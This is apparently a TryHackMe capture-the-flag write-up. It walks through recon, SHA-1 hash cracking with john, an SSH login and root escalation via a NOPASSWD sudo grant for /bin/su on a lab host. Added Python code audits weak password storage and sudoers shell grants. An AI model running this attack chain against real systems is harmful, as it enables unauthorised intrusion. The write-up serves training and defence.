THM: Crash Course Pen Testing
Write-up for the final challenge of the CC: Pen Testing room at TryHackMe

| Field | Value |
|---|---|
| Name | Try Hack Me / CC: Pen Testing |
| Author | Asentinn / OkabeRintaro |
The target IP is 10.10.113.202. I'm assigning it to the `$IP` variable for ease of use.
Scanning for open ports:

```
$ nmap -sC -sV -p- $IP -oN nmap-$IP.out
```
Then rescan the open ports with XML output, which is the input `searchsploit --nmap` expects:

```
$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-10.10.113.202.xml
```
Then `nikto`, and `ffuf` for practice:

```
$ nikto -h $IP -o nikto-$IP.txt
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md
```
The `ffuf` command can be a little complicated, so let me explain it a bit:

- `-w`: wordlist for fuzzing; the `:FUZZ` suffix names the keyword that gets replaced in the URL
- `-u`: target URL
- `-recursion` / `-recursion-depth`: when `ffuf` finds a directory, it starts another scan after the current one finishes (you will recognize it in the output)
- `-e`: a useful one; it simultaneously tries the listed extensions, but be careful with it, as it multiplies the amount of work by N, where N is the number of extensions (for each wordlist entry it also tries appending each extension)
- `-v`: shows the full URL of each finding (useful with recursion enabled)
- `-of`: output format; `ffuf` output files are not the easiest to read, and I chose Markdown for now
- `-o`: the name of the output file; the shell resolves `$IP`, so the result is `fuzz-10.10.113.202.md`
Cracking user password
Both found the `/secret/` directory, and `ffuf` further tracked down `secret.txt` inside it:

```
$ curl http://10.10.200.35/secret/secret.txt
```
This is definitely the hash of a user password. I will be using `john` to crack it, and it could be run blindly on that file, but let's use the `hash-identifier` that comes with Kali to see its output, just out of curiosity.

```
$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8
```
As we can see, it is a SHA-1 hash. Now cracking it with `john`:

```
$ john -format=Raw-SHA1 secret.txt
```

That was really fast (don't ever use such weak passwords, of course). So we've got the credentials nyan/nyan. Let's try logging in with these over SSH.
```
$ ssh nyan@$IP
```

We're in. I'm getting the user flag:

```
nyan@ubuntu:~$ cat user.txt
```
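Back to the hash in `secret.txt`: the reason `john` finished instantly is not only the weak password but the storage scheme, a bare SHA-1 digest with no salt and no work factor. As an added example (not code from the room or its author), here is the check a defender would run over a credential store in Python: it classifies each record by its shape the way `hash-identifier` did, verifies passwords in constant time, flags legacy SHA-1 entries, and re-hashes them with salted PBKDF2-HMAC-SHA256 on the next successful login. The sample store, the user names, the `pbkdf2_sha256$iters$salt$hash` record layout and the iteration count are assumptions constructed for this example.

```python
import hashlib
import hmac
import os
import re
from typing import Dict, List, Optional

# Added example, not code from the room or its author. A credential store
# that keeps a bare SHA-1 digest (40 hex chars, no salt, no work factor) is
# exactly the weakness john exploited above; this module classifies records,
# verifies them safely and migrates legacy ones on the next successful login.

SHA1_RE = re.compile(r"^[0-9a-fA-F]{40}$")
# Assumed record layout for the hardened scheme: pbkdf2_sha256$iters$salt$hash
PBKDF2_RE = re.compile(r"^pbkdf2_sha256\$(\d+)\$([0-9a-f]+)\$([0-9a-f]+)$")
ITERATIONS = 600_000  # assumed work factor; tune it to ~100 ms on your server


def classify_record(record: str) -> str:
    """Name the storage scheme of a stored credential from its shape."""
    if SHA1_RE.match(record):
        return "unsalted-sha1"
    if PBKDF2_RE.match(record):
        return "pbkdf2-sha256"
    return "unknown"


def make_pbkdf2_record(password: str, salt: Optional[bytes] = None,
                       iterations: int = ITERATIONS) -> str:
    """Build a salted, iterated record with a fresh random salt per password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify(password: str, record: str) -> bool:
    """Constant-time verification for either scheme; unknown formats fail closed."""
    scheme = classify_record(record)
    if scheme == "unsalted-sha1":
        candidate = hashlib.sha1(password.encode()).hexdigest()
        return hmac.compare_digest(candidate, record.lower())
    if scheme == "pbkdf2-sha256":
        iterations, salt_hex, stored = PBKDF2_RE.match(record).groups()
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(digest.hex(), stored)
    return False


def migrate_on_login(password: str, record: str) -> Optional[str]:
    """If the password matches a legacy SHA-1 record, return a PBKDF2 replacement."""
    if classify_record(record) == "unsalted-sha1" and verify(password, record):
        return make_pbkdf2_record(password)
    return None


def audit(store: Dict[str, str]) -> List[str]:
    """List every user whose credential is still a bare SHA-1 digest."""
    return [f"{user}: unsalted SHA-1, crackable offline in seconds; migrate"
            for user, record in store.items()
            if classify_record(record) == "unsalted-sha1"]


# Constructed sample store (not the room's data): the legacy entry is computed
# here from a sample password so the example runs offline.
SAMPLE_STORE: Dict[str, str] = {
    "legacyuser": hashlib.sha1(b"Winter2021").hexdigest().upper(),
    "newuser": make_pbkdf2_record("Winter2021", salt=bytes(16), iterations=1_000),
}

if __name__ == "__main__":
    for finding in audit(SAMPLE_STORE):
        print(finding)
    print(verify("Winter2021", SAMPLE_STORE["legacyuser"]))   # True
    replacement = migrate_on_login("Winter2021", SAMPLE_STORE["legacyuser"])
    print(classify_record(replacement))                          # pbkdf2-sha256
```

The migrate-on-login pattern is the practical way out of a legacy store: you cannot re-hash what you do not have in plaintext, so each record is upgraded the moment its owner authenticates, and `audit` tells you how many are still waiting.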
Running `sudo -l` shows that user nyan can run `/bin/su` as root without specifying a password. Just by seeing this sudoers entry we know that nyan is a sudoer and can execute `sudo /bin/su` to become root. Otherwise, when running `sudo -l`, we would see `Sorry, user nyan may not run sudo on ubuntu` (where `ubuntu` is the host name).
We got root! So `cat` out that flag and complete the box:

```
root@ubuntu:/home/nyan# cat /root/root.txt
```
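The defender's counterpart to that `sudo -l` check is to audit sudoers for grants that hand a non-root principal a root shell, as the `(root) NOPASSWD: /bin/su` entry did here. As an added example (not the room's or the author's code), the Python auditor below parses sudoers text, carries tags such as `NOPASSWD:` across a command list the way sudoers(5) specifies, and reports principals that can reach a root shell, with severity raised when no password is required. The sample sudoers text, the user names, the set of shell-like binaries and the severity labels are constructed assumptions; aliases and include directives are not expanded.

```python
import re
from typing import Iterator, List, Set, Tuple

# Added example, not the room's or the author's code: a small sudoers auditor
# that flags grants like "(root) NOPASSWD: /bin/su". It understands plain
# user/group rules, tags and backslash continuations; it does not expand
# aliases or include directives (an assumption to keep it short).

# Programs that hand the caller a root shell or arbitrary command execution
# (illustrative set; extend it for your environment).
SHELL_LIKE: Set[str] = {
    "/bin/su", "/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh",
    "/usr/bin/su", "/usr/bin/sh", "/usr/bin/bash", "/usr/bin/env",
}

# who  host = (runas) [TAG:]... command, [TAG:]... command, ...
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias",
                 "Runas_Alias", "@include")

Rule = Tuple[str, str, str, Set[str], str]  # who, host, runas, tags, command


def parse_sudoers(text: str) -> Iterator[Rule]:
    """Yield one (who, host, runas, tags, command) per command in each rule."""
    joined = text.replace("\\\n", " ")          # join backslash continuations
    for raw in joined.splitlines():
        line = raw.split("#", 1)[0].strip()     # drop comments and whitespace
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").strip() or "root"  # default runas is root
        tags: Set[str] = set()
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            # Tags such as NOPASSWD: stick to every following command in the
            # list until overridden by the opposite tag, per sudoers(5).
            while ":" in spec and spec.split(":", 1)[0].isupper():
                tag, spec = spec.split(":", 1)
                spec = spec.strip()
                if tag == "PASSWD":
                    tags.discard("NOPASSWD")
                elif tag == "NOPASSWD":
                    tags.discard("PASSWD")
                tags.add(tag)
            if spec:
                yield m.group("who"), m.group("host"), runas, set(tags), spec


def audit_sudoers(text: str) -> List[str]:
    """Return findings for non-root principals that can reach a root shell."""
    findings: List[str] = []
    for who, host, runas, tags, cmd in parse_sudoers(text):
        if who == "root":
            continue
        runas_user = runas.split(":", 1)[0].strip()
        if runas_user not in ("root", "ALL"):
            continue                             # cannot become root this way
        nopasswd = "NOPASSWD" in tags
        severity = "HIGH" if nopasswd else "MEDIUM"
        suffix = " without a password" if nopasswd else ""
        if cmd == "ALL":
            findings.append(f"{severity}: {who} may run ANY command as root on {host}{suffix}")
        elif cmd.split()[0] in SHELL_LIKE:
            findings.append(f"{severity}: {who} may run {cmd} as root on {host}{suffix} (root shell)")
    return findings


# Constructed sample sudoers text for this example, not the room's file.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
nyan    ALL=(root) NOPASSWD: /bin/su
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, \\
                             /bin/bash
alice   ALL=(www-data) /usr/bin/php
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

Note the `backup` line: `/bin/bash` carries no tag of its own, yet it inherits `NOPASSWD` from the `rsync` entry before it, which is a subtlety that eyeballing a sudoers file tends to miss. The fix for the entry that let nyan escalate is to remove the grant, or at least to drop `NOPASSWD` and restrict the rule to the specific non-shell commands the account actually needs.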